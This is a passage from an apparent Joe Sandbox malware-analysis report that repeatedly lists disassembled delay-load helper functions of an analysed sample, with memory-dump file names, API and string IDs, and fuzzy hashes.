                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 8eab8e04029ff0f23f820115fbe32456e2ea4f005994b13f139de0a0798df150
                                                                                    • Instruction ID: 9c37b6cd09948e4b941c485dd5f0776bce596f680dd1c15a6aef064fdaf318e1
                                                                                    • Opcode Fuzzy Hash: 8eab8e04029ff0f23f820115fbe32456e2ea4f005994b13f139de0a0798df150
                                                                                    • Instruction Fuzzy Hash: 93B012E2698104EC3104A1491D0AD77018CC0C0F11B30403EFC05C00C2EC8C6D050531
                                                                                    Function 0073E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: 28a3fc4ec456206b6ec0af0f2eee56efc74914e623f164d50907bfe31efa439c
                                                                                    • Instruction ID: 4bb749487c5ed41b4cf6c9ac71d5a0908d32c8e163562226e6035e5778c47619
                                                                                    • Opcode Fuzzy Hash: 28a3fc4ec456206b6ec0af0f2eee56efc74914e623f164d50907bfe31efa439c
                                                                                    • Instruction Fuzzy Hash: BEB012C1698240FC3204610C9C07D7F011DC0C1F16730523EF804C00C2E88C0D881531
                                                                                    Function 0073E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: PDu<s
                                                                                    • API String ID: 1269201914-3369385606
                                                                                    • Opcode ID: 1c224b7f8f184028c65ade817e5ba6e03d0083aea2c0e4a7ba4147fa95c66de8
                                                                                    • Instruction ID: 7ac1c5184173db6c92327c83140cb239f57f6b6f11df69f9496ab30698e9e3cc
                                                                                    • Opcode Fuzzy Hash: 1c224b7f8f184028c65ade817e5ba6e03d0083aea2c0e4a7ba4147fa95c66de8
                                                                                    • Instruction Fuzzy Hash: 1DB012C1698140FC310421281C0AD7F011DC0C1F15B30503EFC10C04C3A88C0E480431
                                                                                    Function 0073E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    • Opcode ID: 3cd89bb2d3a117e9db6846aae3cb861a4979d34eca39f8f710141420d672ecf4
                                                                                    • Instruction ID: fc47bfdc9d66926e6158a2243901488ec0f965ddff179fd0717612f9164461a6
                                                                                    • Opcode Fuzzy Hash: 3cd89bb2d3a117e9db6846aae3cb861a4979d34eca39f8f710141420d672ecf4
                                                                                    • Instruction Fuzzy Hash: 81B012C1A98200FC314461589D0BDB7015CC0C0F16730523EF804C10C2E88C0E540631
                                                                                    Function 0073E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    • Opcode ID: 6437bc5e725bff520f95d8a94a2ef3b4d50cd4afb5e135c50f76ae7010641e0d
                                                                                    • Instruction ID: f8df0129333290d6b736b76e0f00b1333c4cba1ca7d78415d3eacac73b3f21ca
                                                                                    • Opcode Fuzzy Hash: 6437bc5e725bff520f95d8a94a2ef3b4d50cd4afb5e135c50f76ae7010641e0d
                                                                                    • Instruction Fuzzy Hash: 11B012C1A98100FC310461985E0ADB7015CC0C0F16730523EF804C10C2EC8C0F150531
                                                                                    Function 0073E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E580
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: Fjuns
                                                                                    • API String ID: 1269201914-22545314
                                                                                    • Opcode ID: aec5d58d4fcf4faac53f874e2b101baefc9ae2b1578e0b997580411edc47b27a
                                                                                    • Instruction ID: c54eef1d7d1b9be1be6719bd88ae61aa8a9e5716e5675f7bf9b9f6f0af140625
                                                                                    • Opcode Fuzzy Hash: aec5d58d4fcf4faac53f874e2b101baefc9ae2b1578e0b997580411edc47b27a
                                                                                    • Instruction Fuzzy Hash: 8BB012C1A98104FD310461581D0ADB7014CC0C0F15730503EF804C10C2E88C0E140532
                                                                                    Function 0073E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 9fbf25ac2b9b5b0b499d60e8f4e2f5d0a66c47882acc1be45cba97e426716483
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 9fbf25ac2b9b5b0b499d60e8f4e2f5d0a66c47882acc1be45cba97e426716483
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 78b1d1c5a6f38b0db07ac8aa785b8a1325c4a077024dff318175c84e392efffb
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 78b1d1c5a6f38b0db07ac8aa785b8a1325c4a077024dff318175c84e392efffb
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 70a14ca12acb4df2adbeb500d60d71127bf138d9ff39a95dbbff793352fb2c8e
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 70a14ca12acb4df2adbeb500d60d71127bf138d9ff39a95dbbff793352fb2c8e
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: fedc325d7e4e38f192449028dbefbbfe3b5d8dfc763e06f80b5518c73f6febdd
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: fedc325d7e4e38f192449028dbefbbfe3b5d8dfc763e06f80b5518c73f6febdd
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 091328a83e43285806315bf606f450be3d6a47de8f44cd993739081eebeb9e15
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 091328a83e43285806315bf606f450be3d6a47de8f44cd993739081eebeb9e15
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 42cb8370aaf8bf681e892f04eb68d36d1388720af1edab64a0d3cd89f0e9c8e3
                                                                                    • Instruction ID: d5c9daaff6b67dd3e3833225d4b05c32d302ace79eaa8a1f6b0e2e6c79735ce6
                                                                                    • Opcode Fuzzy Hash: 42cb8370aaf8bf681e892f04eb68d36d1388720af1edab64a0d3cd89f0e9c8e3
                                                                                    • Instruction Fuzzy Hash: 0FA001E66A9246FC310962926D0ADBB021DC4C5B66B30996EFC16C44C2A89868591871
                                                                                    Function 0073E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
